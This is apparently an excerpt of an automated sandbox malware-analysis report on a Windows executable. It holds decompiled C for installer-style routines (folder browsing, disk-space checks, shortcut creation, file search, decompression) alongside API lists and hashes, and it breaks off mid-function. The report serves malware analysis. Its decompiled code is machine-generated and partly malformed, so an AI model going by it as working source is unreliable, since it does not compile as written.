                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID:
                • API String ID: 590372296-0
                • Opcode ID: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                • Opcode Fuzzy Hash: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
                • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404496 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00404496(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a048;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405665(0x3fb, _t146);
					E004061CF(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405665(0x3fb, _t146);
							if(E004059EB(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405F65(0x429840, _t146);
							_t87 = E004062FD(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405F65(0x429840, _t146);
								_t89 = E00405996(0x429840);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429840) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405944(0x429840);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429840) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E0040492A(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebdc; // 0x84bb3a
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404912(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429830);
									} else {
										E0040484D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404048(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a860 == _t158) {
									E004043EF();
								}
								 *0x42a860 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a870;
							_v60 = E004047E7;
							_v56 = _t146;
							_v68 = E00405F87(_t146, 0x42a870, _t166, 0x429c48, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004058FD(_t146);
								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == 0x435400) {
									E00405F87(_t146, 0x42a870, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
										lstrcatA(_t146, 0x42e3a0);
									}
								}
								 *0x42a860 =  *0x42a860 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040596A(_t146) != 0 && E00405996(_t146) == 0) {
						E004058FD(_t146);
					}
					 *0x42ebd8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404026(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404026(_t166);
					E0040405B(_t165);
					_t138 = E004062FD(7);
					if(_t138 == 0) {
						L53:
						return E0040408D(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                0x00404496
                0x0040449c
                0x004044a2
                0x004044af
                0x004044bd
                0x004044c0
                0x004044c8
                0x004044ce
                0x004044ce
                0x004044da
                0x004044dd
                0x0040454b
                0x00404552
                0x00404629
                0x00404630
                0x0040463f
                0x0040463f
                0x00404643
                0x0040464d
                0x0040465a
                0x0040465c
                0x0040465c
                0x0040466a
                0x00404671
                0x00404678
                0x0040467b
                0x004046b2
                0x004046b4
                0x004046ba
                0x004046bf
                0x004046c3
                0x004046c5
                0x004046c5
                0x004046e1
                0x00000000
                0x004046e3
                0x004046e6
                0x004046f4
                0x004046fa
                0x004046fb
                0x004046fe
                0x00404701
                0x00000000
                0x00404701
                0x0040467d
                0x0040467f
                0x00404683
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404685
                0x00404685
                0x00404692
                0x00404697
                0x00000000
                0x00000000
                0x0040469b
                0x0040469d
                0x0040469d
                0x004046a5
                0x004046a7
                0x004046aa
                0x004046ad
                0x004046b0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004046b0
                0x0040470d
                0x00404717
                0x0040471a
                0x0040471d
                0x00404724
                0x00404724
                0x00404726
                0x00404726
                0x0040472b
                0x0040472d
                0x00404735
                0x0040473c
                0x0040473e
                0x00404749
                0x00404749
                0x0040473e
                0x00404750
                0x00404759
                0x00404763
                0x0040476b
                0x00404786
                0x0040476d
                0x00404776
                0x00404776
                0x0040476b
                0x0040478b
                0x00404790
                0x00404795
                0x0040479e
                0x0040479e
                0x004047a7
                0x004047a9
                0x004047a9
                0x004047b5
                0x004047bd
                0x004047c7
                0x004047c7
                0x004047cc
                0x00000000
                0x004047cc
                0x0040467b
                0x00404632
                0x00404639
                0x00000000
                0x00000000
                0x00000000
                0x00404639
                0x00404558
                0x00404561
                0x0040457b
                0x00404580
                0x0040458a
                0x00404591
                0x0040459d
                0x004045a0
                0x004045a3
                0x004045aa
                0x004045b2
                0x004045b5
                0x004045b9
                0x004045c0
                0x004045c8
                0x00404622
                0x004045ca
                0x004045cb
                0x004045d2
                0x004045dc
                0x004045e4
                0x004045f1
                0x00404605
                0x00404609
                0x00404609
                0x00404605
                0x0040460e
                0x0040461b
                0x0040461b
                0x004045c8
                0x00000000
                0x00404580
                0x0040456e
                0x00000000
                0x00000000
                0x00404574
                0x00000000
                0x004044df
                0x004044ec
                0x004044f5
                0x00404502
                0x00404502
                0x00404509
                0x0040450f
                0x00404518
                0x0040451b
                0x0040451e
                0x00404526
                0x00404529
                0x0040452c
                0x00404532
                0x00404539
                0x00404540
                0x004047d2
                0x004047e4
                0x00404546
                0x00404549
                0x00000000
                0x00404549
                0x00404540

                APIs
                • GetDlgItem.USER32 ref: 004044E5
                • SetWindowTextA.USER32(00000000,?), ref: 0040450F
                • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
                • CoTaskMemFree.OLE32(00000000), ref: 004045CB
                • lstrcmpiA.KERNEL32(0042E3A0,0042A870,00000000,?,?), ref: 004045FD
                • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404609
                • SetDlgItemTextA.USER32 ref: 0040461B
                  • Part of subcall function 00405665: GetDlgItemTextA.USER32 ref: 00405678
                  • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                  • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                  • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                  • Part of subcall function 004061CF: CharPrevA.USER32(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                  • Part of subcall function 0040484D: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                  • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                  • Part of subcall function 0040484D: SetDlgItemTextA.USER32 ref: 00404906
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A
                • API String ID: 2624150263-3554254475
                • Opcode ID: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
                • Opcode Fuzzy Hash: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E004020CB() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402AC1(0xfffffff0);
				 *(_t111 - 0xc) = E00402AC1(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402AC1(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402AC1(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402AC1(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040596A( *(_t111 - 0xc)) == 0) {
					E00402AC1(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408514, _t87, 1, 0x408504, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408524, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                0x004020d4
                0x004020de
                0x004020e8
                0x004020f2
                0x004020fd
                0x00402100
                0x0040211a
                0x00402120
                0x00402126
                0x00402129
                0x00402133
                0x00402137
                0x00402137
                0x0040213c
                0x0040214d
                0x00402155
                0x0040222e
                0x0040222e
                0x00402235
                0x0040215b
                0x0040215b
                0x0040216a
                0x0040216e
                0x00402171
                0x00402177
                0x00402185
                0x00402188
                0x0040218a
                0x00402195
                0x00402195
                0x0040219a
                0x0040219c
                0x004021a3
                0x004021a3
                0x004021a6
                0x004021af
                0x004021b2
                0x004021b7
                0x004021b9
                0x004021c6
                0x004021c6
                0x004021c9
                0x004021d2
                0x004021d5
                0x004021de
                0x004021e4
                0x004021eb
                0x00402204
                0x00402206
                0x00402214
                0x00402214
                0x00402204
                0x00402217
                0x0040221d
                0x0040221d
                0x00402220
                0x00402226
                0x0040222c
                0x00402241
                0x00000000
                0x00000000
                0x00000000
                0x0040222c
                0x00402237
                0x00402954
                0x00402960

                APIs
                • CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp, xrefs: 0040218D
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp
                • API String ID: 123533781-1390092544
                • Opcode ID: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                • Instruction ID: 70e90dd273e36d6cf470b0c6c9ff695bb876e65ea6d8ae05c01ad1deac9bcbee
                • Opcode Fuzzy Hash: 3ab9ca111cfd16ea316d8908730db186f13cf70328ad1dfde5033f2efd3f2ba1
                • Instruction Fuzzy Hash: D9512775A00208BFCF10DFE4C988A9DBBB5EF48318F2045AAF915EB2D1DA799941CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E004026F8(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405EC3(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405F65();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                0x00402710
                0x00402724
                0x0040272f
                0x00402730
                0x0040286f
                0x00402712
                0x00402712
                0x00402714
                0x00402716
                0x00402716
                0x00402954
                0x00402960

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
                • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406742 Relevance: .3, Instructions: 334COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 79%
                			E00406742(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406EB1( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4083f8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4083f8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406F19( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406E71))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
